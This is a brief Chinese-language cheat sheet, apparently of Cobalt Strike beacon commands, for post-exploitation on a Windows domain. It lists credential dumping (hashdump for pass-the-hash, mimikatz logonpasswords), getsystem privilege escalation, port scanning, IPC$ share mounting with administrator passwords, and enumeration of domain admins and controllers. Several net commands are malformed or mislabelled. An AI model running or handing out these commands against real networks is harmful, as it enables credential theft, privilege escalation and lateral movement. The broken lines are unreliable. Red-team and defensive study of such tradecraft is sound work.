help
help socks 查看socks命令帮助菜单
jobs 列举任务
jobkill <job id> 停止任务的执行
getuid 查看当前用户名和权限
sleep 修改回连时间
hashdump 获取hash,便于后面PTH攻击
getsystem 提权
logonpasswords 获取明文账号密码(mimikatz)
portscan 10.10.10.1-255 80,443,3389,22,21 arp 扫描存活的主机
shell ipconfig /all 查询所有机器接口(验证是否是域用户)
shell arp -a 扫描网段内存活主机
shell net share 查看IPC$默认共享
shell net use 查看共享连接是否成功
shell net \\10.10.10.30\ipc$ /user:administrator 'passwd'
shell net time
shell net use * /del /y
shell net z: \\10.10.10.30\ipc$ /user:administrator 'passwd' 共享磁盘映射
shell net user /domain 查看域内所有登录账号
shell net group "domain controllers" /domain 查看DC名字
shell net group "domain admins" /domain 查看域管名字
shell net group "domain controllers" /domain 查看域内所有主机名字